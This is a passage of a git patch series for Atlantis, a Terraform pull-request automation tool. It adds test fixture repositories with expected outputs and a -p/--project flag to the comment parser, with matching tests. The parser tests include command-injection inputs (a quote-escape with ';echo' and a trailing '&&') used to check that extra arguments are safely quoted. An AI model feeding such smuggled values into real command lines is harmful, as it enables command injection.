+--- + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt new file mode 100644 index 0000000000..9712df1ee2 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt new file mode 100644 index 0000000000..49c8312cd7 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..b64103b412 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` +- path: `runatlantis/atlantis-tests/.` workspace: `default` diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt new file mode 100644 index 0000000000..caea5e6434 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `production` workspace: `default` 
+```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+ diff --git a/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf new file mode 100644 index 0000000000..14f6a189c1 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf @@ -0,0 +1,10 @@ +variable "var" {} +resource "null_resource" "this" { +} +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} diff --git a/server/testfixtures/test-repos/modules-yaml/production/main.tf b/server/testfixtures/test-repos/modules-yaml/production/main.tf new file mode 100644 index 0000000000..94a103ffba --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/production/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "production" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/staging/main.tf b/server/testfixtures/test-repos/modules-yaml/staging/main.tf new file mode 100644 index 0000000000..15fa81303a --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/staging/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "staging" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt new file mode 100644 index 0000000000..81c3ec8bfa --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `production` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. 
+ +Outputs: + +var = production + +``` + diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt new file mode 100644 index 0000000000..2ec35e2786 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `staging` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = staging + +``` + diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt new file mode 100644 index 0000000000..63b09ca64f --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt @@ -0,0 +1,2 @@ +Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`. + diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. 
+ +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt new file mode 100644 index 0000000000..9712df1ee2 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt new file mode 100644 index 0000000000..49c8312cd7 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt new file mode 100644 index 0000000000..b64103b412 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` +- path: `runatlantis/atlantis-tests/.` workspace: `default` diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt new file mode 100644 index 0000000000..caea5e6434 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `production` workspace: `default` 
+```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+ diff --git a/server/testfixtures/test-repos/modules/modules/null/main.tf b/server/testfixtures/test-repos/modules/modules/null/main.tf new file mode 100644 index 0000000000..14f6a189c1 --- /dev/null +++ b/server/testfixtures/test-repos/modules/modules/null/main.tf @@ -0,0 +1,10 @@ +variable "var" {} +resource "null_resource" "this" { +} +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} diff --git a/server/testfixtures/test-repos/modules/production/main.tf b/server/testfixtures/test-repos/modules/production/main.tf new file mode 100644 index 0000000000..94a103ffba --- /dev/null +++ b/server/testfixtures/test-repos/modules/production/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "production" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/staging/main.tf b/server/testfixtures/test-repos/modules/staging/main.tf new file mode 100644 index 0000000000..15fa81303a --- /dev/null +++ b/server/testfixtures/test-repos/modules/staging/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "staging" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt index 1b856aa5c4..5489b642a8 100644 --- a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt +++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt @@ -1,3 +1,3 @@ Locks and plans deleted for the projects and workspaces modified in this pull request: -- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` \ No newline at end of file From 6b507eb721255dfc830bd00cda60230de5592306 Mon Sep 17 00:00:00 2001 From: Luke Kysow 
Date: Tue, 19 Jun 2018 18:59:31 +0100 Subject: [PATCH 29/69] Add -p flag. --- Makefile | 3 + server/events/comment_parser.go | 18 +++- server/events/comment_parser_test.go | 93 ++++++++++++++++++- server/events/event_parser.go | 20 ++-- server/events/event_parser_test.go | 17 ++-- server/events/markdown_renderer_test.go | 8 +- server/events/models/models.go | 1 + server/events/pull_request_operator.go | 45 ++++++++- server/events/runtime/apply_step_operator.go | 11 ++- server/events/runtime/plan_step_operater.go | 7 +- server/events/yaml/parser_validator.go | 83 ++++++++++++++--- server/events/yaml/parser_validator_test.go | 72 ++++++++++++++ server/events/yaml/raw/project.go | 3 + server/events/yaml/raw/project_test.go | 6 ++ server/events/yaml/raw/step.go | 3 + server/events/yaml/valid/valid.go | 10 ++ server/events_controller.go | 4 +- server/events_controller_e2e_test.go | 58 +++++++----- .../exp-output-apply-production.txt | 2 +- .../modules-yaml/exp-output-apply-staging.txt | 2 +- .../modules-yaml/exp-output-merge.txt | 4 +- .../modules/exp-output-apply-production.txt | 2 +- .../modules/exp-output-apply-staging.txt | 2 +- .../simple-yaml/exp-output-apply-default.txt | 2 +- .../simple-yaml/exp-output-apply-staging.txt | 2 +- ...exp-output-apply-var-default-workspace.txt | 2 +- .../exp-output-apply-var-new-workspace.txt | 2 +- .../simple/exp-output-apply-var.txt | 2 +- .../test-repos/simple/exp-output-apply.txt | 2 +- .../tfvars-yaml-no-autoplan/atlantis.yaml | 29 ++++++ .../default.backend.tfvars | 1 + .../tfvars-yaml-no-autoplan/default.tfvars | 1 + .../exp-output-apply-default.txt | 21 +++++ .../exp-output-apply-staging.txt | 21 +++++ .../exp-output-merge.txt | 3 + .../exp-output-plan-default.txt | 23 +++++ .../exp-output-plan-staging.txt | 23 +++++ .../tfvars-yaml-no-autoplan/main.tf | 19 ++++ .../staging.backend.tfvars | 1 + .../tfvars-yaml-no-autoplan/staging.tfvars | 1 + .../test-repos/tfvars-yaml/atlantis.yaml | 25 +++++ 
.../tfvars-yaml/default.backend.tfvars | 1 + .../test-repos/tfvars-yaml/default.tfvars | 1 + .../tfvars-yaml/exp-output-apply-default.txt | 21 +++++ .../exp-output-apply-default.txt.act | 7 ++ .../tfvars-yaml/exp-output-apply-staging.txt | 21 +++++ .../tfvars-yaml/exp-output-autoplan.txt | 51 ++++++++++ .../tfvars-yaml/exp-output-autoplan.txt.act | 61 ++++++++++++ .../tfvars-yaml/exp-output-merge.txt | 3 + .../test-repos/tfvars-yaml/main.tf | 19 ++++ .../tfvars-yaml/staging.backend.tfvars | 1 + .../test-repos/tfvars-yaml/staging.tfvars | 1 + 52 files changed, 760 insertions(+), 81 deletions(-) create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt create mode 100644 
server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/main.tf create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.tfvars diff --git a/Makefile b/Makefile index 442d4b90ee..5f10ddf0eb 100644 --- a/Makefile +++ b/Makefile @@ -35,6 +35,9 @@ regen-mocks: ## Delete all mocks and then run go generate to regen them go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static) test: ## Run tests + @go test -short $(PKG) + +test-all: ## Run tests including integration @go test $(PKG) test-coverage: diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index 69e845197a..808d4493a9 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -21,6 +21,7 @@ import ( "strings" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/spf13/pflag" ) @@ -29,6 +30,8 @@ const ( WorkspaceFlagShort = "w" DirFlagLong = "dir" DirFlagShort = "d" + ProjectFlagLong = "project" + ProjectFlagShort = "p" VerboseFlagLong = "verbose" VerboseFlagShort = "" DefaultWorkspace = "default" @@ -131,6 +134,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen var workspace string var dir string + var project string var verbose bool var extraArgs []string var flagSet *pflag.FlagSet @@ -144,6 +148,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen flagSet.SetOutput(ioutil.Discard) 
flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.") flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.") + flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Which project to run plan for. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename)) flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") case Apply.String(): name = Apply @@ -151,6 +156,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen flagSet.SetOutput(ioutil.Discard) flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.") flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.") + flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Apply the plan for this project. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename)) flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") default: return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)} @@ -198,8 +204,18 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen return CommentParseResult{CommentResponse: e.errMarkdown(fmt.Sprintf("invalid workspace: %q", workspace), command, flagSet)} } + // If project is specified, dir or workspace should not be set. 
Since we + // dir/workspace have defaults we can't detect if the user set the flag + // to the default or didn't set the flag so there is an edge case here we + // don't detect, ex. atlantis plan -p project -d . -w default won't cause + // an error. + if project != "" && (workspace != DefaultWorkspace || dir != DefaultDir) { + err := fmt.Sprintf("cannot use -%s/--%s at same time as -%s/--%s or -%s/--%s", ProjectFlagShort, ProjectFlagLong, DirFlagShort, DirFlagLong, WorkspaceFlagShort, WorkspaceFlagLong) + return CommentParseResult{CommentResponse: e.errMarkdown(err, command, flagSet)} + } + return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace, false), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false), } } diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go index 81fe4da9f8..db44003724 100644 --- a/server/events/comment_parser_test.go +++ b/server/events/comment_parser_test.go @@ -255,6 +255,22 @@ func TestParse_InvalidWorkspace(t *testing.T) { } } +func TestParse_UsingProjectAtSameTimeAsWorkspaceOrDir(t *testing.T) { + cases := []string{ + "atlantis plan -w workspace -p project", + "atlantis plan -d dir -p project", + "atlantis plan -d dir -w workspace -p project", + } + for _, c := range cases { + t.Run(c, func(t *testing.T) { + r := commentParser.Parse(c, models.Github) + exp := "Error: cannot use -p/--project at same time as -d/--dir or -w/--workspace" + Assert(t, strings.Contains(r.CommentResponse, exp), + "For comment %q expected CommentResponse %q to contain %q", c, r.CommentResponse, exp) + }) + } +} + func TestParse_Parsing(t *testing.T) { cases := []struct { flags string @@ -262,6 +278,7 @@ func TestParse_Parsing(t *testing.T) { expDir string expVerbose bool expExtraArgs string + expProject string }{ // Test defaults. { @@ -270,14 +287,16 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, - // Test each flag individually. 
+ // Test each short flag individually. { "-w workspace", "workspace", ".", false, "", + "", }, { "-d dir", @@ -285,6 +304,15 @@ func TestParse_Parsing(t *testing.T) { "dir", false, "", + "", + }, + { + "-p project", + "default", + ".", + false, + "", + "project", }, { "--verbose", @@ -292,6 +320,32 @@ func TestParse_Parsing(t *testing.T) { ".", true, "", + "", + }, + // Test each long flag individually. + { + "--workspace workspace", + "workspace", + ".", + false, + "", + "", + }, + { + "--dir dir", + "default", + "dir", + false, + "", + "", + }, + { + "--project project", + "default", + ".", + false, + "", + "project", }, // Test all of them with different permutations. { @@ -300,6 +354,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", }, { "-d dir -w workspace --verbose", @@ -307,6 +362,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", }, { "--verbose -w workspace -d dir", @@ -314,6 +370,23 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", + }, + { + "-p project --verbose", + "default", + ".", + true, + "", + "project", + }, + { + "--verbose -p project", + "default", + ".", + true, + "", + "project", }, // Test that flags after -- are ignored { @@ -322,6 +395,7 @@ func TestParse_Parsing(t *testing.T) { "dir", false, "\"--verbose\"", + "", }, { "-w workspace -- -d dir --verbose", @@ -329,6 +403,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "\"-d\" \"dir\" \"--verbose\"", + "", }, // Test the extra args parsing. { @@ -337,6 +412,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, // Test trying to escape quoting { @@ -345,6 +421,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, `"\";echo" "\"hi"`, + "", }, { "-w workspace -d dir --verbose -- arg one -two --three &&", @@ -352,6 +429,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, // Test whitespace. 
{ @@ -360,6 +438,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, { " -w workspace -d dir --verbose -- arg one -two --three &&", @@ -367,6 +446,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, // Test that the dir string is normalized. { @@ -375,6 +455,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d /adir", @@ -382,6 +463,7 @@ func TestParse_Parsing(t *testing.T) { "adir", false, "", + "", }, { "-d .", @@ -389,6 +471,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d ./", @@ -396,6 +479,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d ./adir", @@ -403,6 +487,7 @@ func TestParse_Parsing(t *testing.T) { "adir", false, "", + "", }, } for _, test := range cases { @@ -428,6 +513,9 @@ func TestParse_Parsing(t *testing.T) { var PlanUsage = `Usage of plan: -d, --dir string Which directory to run plan in relative to root of repo, ex. 'child/dir'. (default ".") + -p, --project string Which project to run plan for. Refers to the name of the + project configured in atlantis.yaml. Cannot be used at + same time as workspace or dir flags. --verbose Append Atlantis log to comment. -w, --workspace string Switch to this Terraform workspace before planning. (default "default") @@ -436,6 +524,9 @@ var PlanUsage = `Usage of plan: var ApplyUsage = `Usage of apply: -d, --dir string Apply the plan for this directory, relative to root of repo, ex. 'child/dir'. (default ".") + -p, --project string Apply the plan for this project. Refers to the name of + the project configured in atlantis.yaml. Cannot be used + at same time as workspace or dir flags. --verbose Append Atlantis log to comment. -w, --workspace string Apply the plan for this Terraform workspace. 
(default "default") diff --git a/server/events/event_parser.go b/server/events/event_parser.go index 448dcee867..dbdccc8e50 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -47,14 +47,17 @@ type Command struct { // Autoplan is true if the command is a plan command being executed in an // attempt to automatically run plan. Autoplan bool + // ProjectName is the name of a project to run the command on. It refers to a + // project specified in an atlantis.yaml file. + ProjectName string } func (c Command) String() string { - return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ",")) + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ",")) } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. 
validDir := path.Clean(dir) if validDir == "/" { @@ -64,12 +67,13 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work workspace = DefaultWorkspace } return &Command{ - Dir: validDir, - Flags: flags, - Name: name, - Verbose: verbose, - Workspace: workspace, - Autoplan: autoplan, + Dir: validDir, + Flags: flags, + Name: name, + Verbose: verbose, + Workspace: workspace, + Autoplan: autoplan, + ProjectName: project, } } diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 2e9b7e4346..1415ffba3f 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -283,25 +283,26 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false) + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false) Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "", false) + cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false) Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false) + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false) Equals(t, events.Command{ - Workspace: "workspace", - Dir: "dir", - Verbose: true, - Flags: []string{"a", "b"}, - Name: events.Plan, + Workspace: "workspace", + Dir: "dir", + Verbose: true, + Flags: []string{"a", "b"}, + Name: events.Plan, + ProjectName: "project", }, *cmd) } diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 414d300810..202097e9be 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -50,7 +50,7 @@ func TestRenderErr(t 
*testing.T) { } for _, verbose := range []bool{true, false} { t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { @@ -88,7 +88,7 @@ func TestRenderFailure(t *testing.T) { } for _, verbose := range []bool{true, false} { t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { @@ -105,7 +105,7 @@ func TestRenderErrAndFailure(t *testing.T) { Error: errors.New("error"), Failure: "failure", } - s := r.Render(res, events.Plan, "", false) + s := r.Render(res, events.Plan, "", false, false) Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s) } @@ -263,7 +263,7 @@ func TestRenderProjectResults(t *testing.T) { } for _, verbose := range []bool{true, false} { t.Run(c.Description, func(t *testing.T) { - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { diff --git a/server/events/models/models.go b/server/events/models/models.go index d4ba85fee0..a71251e7b0 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -237,4 +237,5 @@ type ProjectCommandContext struct { // ex. 
atlantis plan -- -target=resource CommentArgs []string Workspace string + ProjectName string } diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index 6012214f52..fabad33d0f 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -1,6 +1,7 @@ package events import ( + "fmt" "os" "path/filepath" @@ -80,6 +81,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon User: ctx.User, Log: ctx.Log, RepoRelPath: mp.Path, + ProjectName: "", ProjectConfig: nil, GlobalConfig: nil, CommentArgs: nil, @@ -99,6 +101,10 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // project config. for i := 0; i < len(matchingProjects); i++ { mp := matchingProjects[i] + var projectName string + if mp.Name != nil { + projectName = *mp.Name + } projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -108,6 +114,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon CommentArgs: nil, Workspace: mp.Workspace, RepoRelPath: mp.Dir, + ProjectName: projectName, ProjectConfig: &mp, GlobalConfig: &config, }) @@ -139,11 +146,25 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } - if !os.IsNotExist(err) { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + hasAtlantisYAML := !os.IsNotExist(err) + if hasAtlantisYAML { + // If they've specified a project by name we look it up. Otherwise we + // use the dir and workspace. 
